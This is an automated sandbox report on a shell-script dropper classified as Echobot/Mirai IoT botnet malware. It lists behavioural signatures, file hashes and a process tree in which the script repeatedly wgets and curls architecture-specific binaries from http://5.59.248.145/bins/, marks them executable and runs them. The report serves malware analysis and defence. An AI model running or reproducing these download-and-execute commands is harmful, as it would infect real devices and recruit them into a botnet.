Overview

overview

10

Static

static

1

c6cb56d51a...c5c.sh

ubuntu-18.04-amd64

10

c6cb56d51a...c5c.sh

debian-9-armhf

10

c6cb56d51a...c5c.sh

debian-9-mips

10

c6cb56d51a...c5c.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    176s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28-10-2024 03:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh

  • Size

    1KB

  • MD5

    a40d8e1695f7f86ab08feb9465a4d69e

  • SHA1

    48ce62e5415710d5b8d7f9d120842010f259909d

  • SHA256

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c

  • SHA512

    09e74caae29b43281aaca4e7a9a64667a85040184249c9cb9b9903109f8ec06782cbf7861129f905f895d8cc1516dab6969c2d9a174478c509b2d707e355268f

Score
10/10
echobotmiraiantivmbotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 4 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (178738) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 14 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 7 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 7 IoCs
  • Checks CPU configuration 1 TTPs 10 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

    antivm
  • Reads system network configuration 1 TTPs 7 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    1⤵
    • Writes file to tmp directory
    PID:661
    • /usr/bin/wget
      wget http://5.59.248.145/bins/jade.x86
      2⤵
      • Writes file to tmp directory
      PID:663
    • /usr/bin/curl
      curl -O http://5.59.248.145/bins/jade.x86
      2⤵
      • Checks CPU configuration
      • Writes file to tmp directory
      PID:687
    • /bin/cat
      cat jade.x86
      2⤵
        PID:691
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
        2⤵
        • File and Directory Permissions Modification
        PID:692
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:693
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:695
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mips
        2⤵
        • Checks CPU configuration
        • Reads runtime system information
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:700
      • /bin/cat
        cat jade.mips
        2⤵
        • System Network Configuration Discovery
        PID:714
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
        2⤵
        • File and Directory Permissions Modification
        PID:716
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:717
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:719
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:732
      • /bin/cat
        cat jade.mpsl
        2⤵
          PID:750
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.mpsl jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
          2⤵
          • File and Directory Permissions Modification
          PID:751
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Executes dropped EXE
          PID:752
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm
          2⤵
          • Writes file to tmp directory
          PID:754
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm
          2⤵
          • Checks CPU configuration
          • Writes file to tmp directory
          PID:757
        • /bin/cat
          cat jade.arm
          2⤵
            PID:768
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.mips jade.mpsl jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
            2⤵
            • File and Directory Permissions Modification
            PID:770
          • /tmp/cp
            ./cp arm
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:772
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.arm5
            2⤵
            • Writes file to tmp directory
            PID:776
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.arm5
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:791
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.mips jade.mpsl jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
            2⤵
            • File and Directory Permissions Modification
            PID:801
          • /tmp/cp
            ./cp arm5
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:802
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.arm6
            2⤵
            • Writes file to tmp directory
            PID:811
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.arm6
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:818
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.mips jade.mpsl jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
            2⤵
            • File and Directory Permissions Modification
            PID:820
          • /tmp/cp
            ./cp arm6
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:821
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.arm7
            2⤵
            • Writes file to tmp directory
            PID:829
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.arm7
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:836
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.x86 systemd-private-bdbef1d16f5243c8a3f493430023252a-systemd-timedated.service-93fDzE
            2⤵
            • File and Directory Permissions Modification
            PID:838
          • /tmp/cp
            ./cp arm7
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:839
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.ppc
            2⤵
            • Writes file to tmp directory
            PID:848
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.ppc
            2⤵
            • Checks CPU configuration
            • Writes file to tmp directory
            PID:855
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.ppc jade.x86
            2⤵
            • File and Directory Permissions Modification
            PID:857
          • /tmp/cp
            ./cp ppc
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:858
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.m68k
            2⤵
            • Writes file to tmp directory
            PID:864
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.m68k
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:871
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.x86
            2⤵
            • File and Directory Permissions Modification
            PID:873
          • /tmp/cp
            ./cp m68k
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:874
          • /usr/bin/wget
            wget http://5.59.248.145/bins/jade.sh4
            2⤵
            • Writes file to tmp directory
            PID:878
          • /usr/bin/curl
            curl -O http://5.59.248.145/bins/jade.sh4
            2⤵
            • Checks CPU configuration
            • Reads runtime system information
            • Writes file to tmp directory
            PID:887
          • /bin/chmod
            chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.sh4 jade.x86
            2⤵
            • File and Directory Permissions Modification
            PID:889
          • /tmp/cp
            ./cp sh4
            2⤵
            • Executes dropped EXE
            • Modifies Watchdog functionality
            • Enumerates active TCP sockets
            • Changes its process name
            • Reads system network configuration
            • Reads runtime system information
            PID:890

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • /tmp/cp
          Filesize

          95KB

          MD5

          5059c698bfa13806cb55d8aa9e6b9b95

          SHA1

          15b9be86d584a4dc8dda5362652ede9a3394ed7c

          SHA256

          da981a689f7e31471175bb11492fd8d68cdef6c62c0bfba2e2abb920766841c6

          SHA512

          4c2ece09c98aa200ff3ea2df0da176f39d20cb76a3604503c6d1b2a977fdb611cb8647c5485558db63f63d4e10c634ad464aa9337d378eab6aecb9546ee45929

          Download Submit

        • /tmp/cp
          Filesize

          99KB

          MD5

          6d9c0a62ac0f74aa31e3b29e8ed657db

          SHA1

          ee08239789e1d5920cdac5dfa64e4ec4a867b393

          SHA256

          f166d6c0baffa303bf8e2e08d11966062a7d0024cfd57212f3ad7b069fad66b5

          SHA512

          fbb875076cc6b11a623973898ad59e4f01316ba0f86b273edb39639eb9ea3daf0bc061fe1ebd1d0d7111ae1ed2f68ec780ed64f230d1436cecbea6f2525501c2

          Download Submit

        • /tmp/cp
          Filesize

          77KB

          MD5

          2c9ef6a2710645a8d64869738074d17b

          SHA1

          2b3bbb724a0919a38d3fcdc626002a3c0c47ee60

          SHA256

          62aeabd5d0f899a9bb436001273c7c94549d70187e93fa29538e401e35c8cd24

          SHA512

          a4c7381bcb035606b420435091a5051e39d2037bcba2dd51041845e32e9f004a9071654e5662b615742cfad3dc4a122fdebdb13dab9a563e4a5bdca045f3ba7d

          Download Submit

        • /tmp/jade.x86
          Filesize

          68KB

          MD5

          9dae832b43230cdf6f41aeeb8aff1a30

          SHA1

          f399b7f5c4a08298d0a199ee27ab96a546f23c2e

          SHA256

          337f54805daa4730a201e251146a89820eb23aaa4604f681781c016b12c91c21

          SHA512

          ba90eb1d666d12933870c43acfb511ded11ce1c2105c2fda617865584713f31e323480e9c1e4cdbb6bdb5d694ed82b177e522a0e81c8486c90e1c1e9e54e521b

          Download Submit